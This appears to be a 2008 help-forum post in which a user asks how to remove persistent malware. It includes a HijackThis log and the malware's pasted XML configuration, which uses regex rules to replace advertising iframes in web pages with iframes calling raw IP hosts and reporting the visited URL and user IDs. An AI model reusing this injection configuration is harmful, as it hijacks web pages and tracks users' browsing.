July 24, 2008 01:49pm pdt

1. rpggamer... 152,834
2. IndiGenus 107,585
3. Firstedition0 9,800
4. 1972vet 9,200
5. briancassin 8,350
6. orangutang 6,990
7. Jonvee 6,400
8. Admin3k 6,050
9. Sheharya... 4,900
10. flubbster 3,500
11. rindi 3,250
12. gnurl 3,240
13. willcomp 2,950
14. war1 2,900
15. johnb6767 2,600
15. phototropic 2,600

1. rpggamer... 243,818
2. IndiGenus 146,750
3. Sheharya... 18,410
4. orangutang 13,990
5. Jonvee 12,562
6. johnb6767 10,443
7. Firstedition0 9,800
8. 1972vet 9,200
9. rindi 8,790
10. briancassin 8,350
11. r-k 7,845
12. war1 7,150
13. willcomp 6,510
14. Admin3k 6,050
15. souseran 5,700

01.27.2008 at 01:31PM PST, ID: 23115046

	[x] Attachment Details

[x]

The Solution Rating System

With so many solutions, how can you tell which solutions are most likely to help you and which ones are not? To provide you with a tool to use, we rate our solutions based on various elements that most accurately determine if a solution is a quality solution. To explain what factors affect the solution rating, here are the elements we take into consideration when formulating our solution rating.

The Grade of the Solution
The Zone Rank of the Expert Providing the Solution
The Number of Author and Expert Comments
The Number of Experts Contributing
The Feedback of the Community

Your Input Matters
Because of the way the system is set up, the most important variable in this equation is you. As a member of Experts Exchange, you are able to cast your vote on the quality of the solutions in regard to how complete, accurate, helpful and easy to understand each solution is. When you provide your feedback, each rating is adjusted accordingly. So, if you see a solution that has a poor rating that you think is a good solution, let us know by rating it. As you do, the rating will be adjusted and will become more accurate for other members of our site.

If you have any suggestions that you would like to make for our rating system, please ask a question in the Suggestions Zone of Community Support.

Thank you!

4.2

Help me remove persistent malware

Zones: HijackThis Software, Windows XP Operating System, Spyware / Ad Blockers

Hi

I have a problem with a PC in that some malware seems to get half removed by McAfee, which leaves the web pages incompletely loaded. Ok, I have solved that by using Opera BUT, I cannot get rid of this pest. I use McAfee, Spy Hunterm Uniblue Spy Eraser and RogueRemover pro-nothing will shift this.

It starts with an XML page that regenerates itself when removed.(see end of this question for the content). This appears in the HKLM Run section, to run Rundll32.exe (from the system32 directory via prefetching commands) This in turn runs a dll, which is in the system32 directory. This malware even logs on as another user (I have since changed the log on to a guest and with password control to try and prevent this).

Hre is the HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:26:24, on 27-01-2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Programmer\McAfee\MPF\MPFSrv.exe
C:\PROGRA~1\McAfee\MPS\mps.exe
C:\Programmer\McAfee\MSK\MskSrver.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Programmer\SiteAdvisor\6253\SAService.exe
C:\WINDOWS\system32\svchost.exe
C:\Programmer\McAfee\MSK\MskAgent.exe
C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
C:\WINDOWS\StartupMonitor.exe
C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
C:\Programmer\McAfee\MPS\mpsevh.exe
C:\Programmer\HP\Digital Imaging\bin\hpqimzone.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\WINDOWS\System32\alg.exe
C:\Programmer\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Programmer\HP\Digital Imaging\Product Assistant\bin\hprblog.exe
C:\Documents and Settings\Anne\Skrivebord\Startup.exe
C:\WINDOWS\system32\HPZinw12.exe
C:\WINDOWS\regedit.exe
C:\Documents and Settings\Anne\Skrivebord\HiJackThis.exe
C:\PROGRAM FILES\PROCESS EXPLORER\PROCEXP.EXE
C:\WINDOWS\explorer.exe
C:\Programmer\Opera\Opera.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://dellsearchedit.myway.com/samisc/dellsidebar.jhtml?p=DJ
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.epilepsiforeningen.dk/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hyperlinks
O3 - Toolbar: McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Programmer\SiteAdvisor\6253\SiteAdv.dll
O4 - HKLM\..\Run: [DLA] C:\WINDOWS\System32\DLA\DLACTRLW.EXE
O4 - HKLM\..\Run: [MskAgentexe] C:\Programmer\McAfee\MSK\MskAgent.exe
O4 - HKLM\..\Run: [SiteAdvisor] C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
O4 - HKLM\..\Run: [Run StartupMonitor] StartupMonitor.exe
O4 - HKLM\..\Run: [Spyhunter Security Suite] "C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe" -minimized
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKAL TJENESTE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETVÆRKSTJENESTE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Programmer\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Image Zone Hurtig start.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqthb08.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Programmer\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Send til &Bluetooth-enhed... - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: FirstClass® - {02011FE3-C22B-451d-9A25-BF4DBB38B8E7} - C:\WINDOWS\Downloaded Program Files\fcplugin.dll
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O16 - DPF: {11818680-FCF6-11D0-9808-0800092A4865} (Adobe Form Control) - http://www.kps.dk/Codebase/FormCtl.cab
O16 - DPF: {1469FF24-47F6-11D2-8805-006008C537E3} (Adobe Mail Control) - http://www.kps.dk/codebase/ffmail.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/4,0,0,101/mcinsctl.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201280089546
O16 - DPF: {9C196458-4145-46AF-8A77-1506878DFECA} (FirstClass® Control) - ftp://ftp.sektornet.dk/sektornet/skolekom/fcplugin.cab
O16 - DPF: {CDDCFBB3-4D93-11D2-B1A9-00A0C9B742BE} (Adobe Script Object) - http://www.kps.dk/codebase/scriptobject.cab
O16 - DPF: {D8575CE3-3432-4540-88A9-85A1325D3375} (e-Safekey) - https://netbank.danskebank.dk/html/activex/e-Safekey/DB/e-Safekey.cab
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Programmer\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: McAfee E-mail Proxy (Emproxy) - McAfee, Inc. - C:\PROGRA~1\FÆLLES~1\McAfee\EmProxy\emproxy.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmer\Fælles filer\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Programmer\iPod\bin\iPodService.exe
O23 - Service: McAfee HackerWatch Service - McAfee, Inc. - C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
O23 - Service: McAfee Update Manager (mcmispupdmgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcupdmgr.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Protection Manager (mcpromgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Redirector Service (McRedirector) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee SystemGuards (McSysmon) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Programmer\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee Privacy Service (MPS9) - McAfee, Inc. - C:\PROGRA~1\McAfee\MPS\mps.exe
O23 - Service: McAfee SpamKiller Service (MSK80Service) - McAfee Inc. - C:\Programmer\McAfee\MSK\MskSrver.exe
O23 - Service: Intel NCS NetService (NetSvc) - Intel(R) Corporation - C:\Programmer\Intel\PROSetWired\NCS\Sync\NetSvc.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SiteAdvisor-tjeneste (SiteAdvisor Service) - Unknown owner - C:\Programmer\SiteAdvisor\6253\SAService.exe

--
End of file - 8833 bytes

(See the HKLM entry for BM870dc8a8)

BM870dc8a8 is this:

<ROOT><CAMPAIGNLIST><CAMPAIGN name="120x240" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x240;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ae4390b5' name='ae4390b5' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x240&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='240'><a href='http://85.12.43.83/www/delivery/ck.php?n=ad03d9ca' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=35&n=ad03d9ca' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x600" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a57232fb' name='a57232fb' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='600'><a href='http://85.12.43.83/www/delivery/ck.php?n=a2d7629e' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=36&n=a2d7629e' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8c6b7cd' name='a8c6b7cd' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a0118327' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=37&n=a0118327' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="125x125" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=125x125;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a6ea2661' name='a6ea2661' src='http://85.17.166.173/go/?cmp=nm_bm3s_125x125&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='125' height='125'><a href='http://85.12.43.83/www/delivery/ck.php?n=afe4b666' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=38&n=afe4b666' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="160x600" id="20080124"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=160x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8a9405d' name='a8a9405d' src='http://85.17.166.173/go/?cmp=nm_bm3s_160x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='160' height='600'></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="180x150" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=180x150;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aa44b86f' name='aa44b86f' src='http://85.17.166.173/go/?cmp=nm_bm3s_180x150&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='180' height='150'><a href='http://85.12.43.83/www/delivery/ck.php?n=a935a5aa' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=39&n=a935a5aa' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="234x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=234x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a80f0628' name='a80f0628' src='http://85.17.166.173/go/?cmp=nm_bm3s_234x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='234' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=a61ab872' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=40&n=a61ab872' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="240x400" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=240x400;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a4da5d34' name='a4da5d34' src='http://85.17.166.173/go/?cmp=nm_bm3s_240x400&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='240' height='400'><a href='http://85.12.43.83/www/delivery/ck.php?n=a424da19' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=41&n=a424da19' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="250x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=250x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ad90e55d' name='ad90e55d' src='http://85.17.166.173/go/?cmp=nm_bm3s_250x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='250' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=ac032ecf' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=42&n=ac032ecf' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x100" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x100;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1111aad' name='a1111aad' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x100&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='100'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8b2301d' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=43&n=a8b2301d' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a7b91358' name='a7b91358' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa619a73' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=44&n=aa619a73' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="336x280" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=336x280;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1e38bd4' name='a1e38bd4' src='http://85.17.166.173/go/?cmp=nm_bm3s_336x280&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='336' height='280'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa2664b8' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=45&n=aa2664b8' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="468x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=468x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a24b320b' name='a24b320b' src='http://85.17.166.173/go/?cmp=nm_bm3s_468x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='468' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa173903' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=46&n=aa173903' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="720x300" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=720x300;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aaf81f87' name='aaf81f87' src='http://85.17.166.173/go/?cmp=nm_bm3s_720x300&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='720' height='300'><a href='http://85.12.43.83/www/delivery/ck.php?n=afb3d0f9' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=47&n=afb3d0f9' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="728x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=728x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aff78e03' name='aff78e03' src='http://85.17.166.173/go/?cmp=nm_bm3s_728x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='728' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8ac5ed4' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=48&n=a8ac5ed4' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time 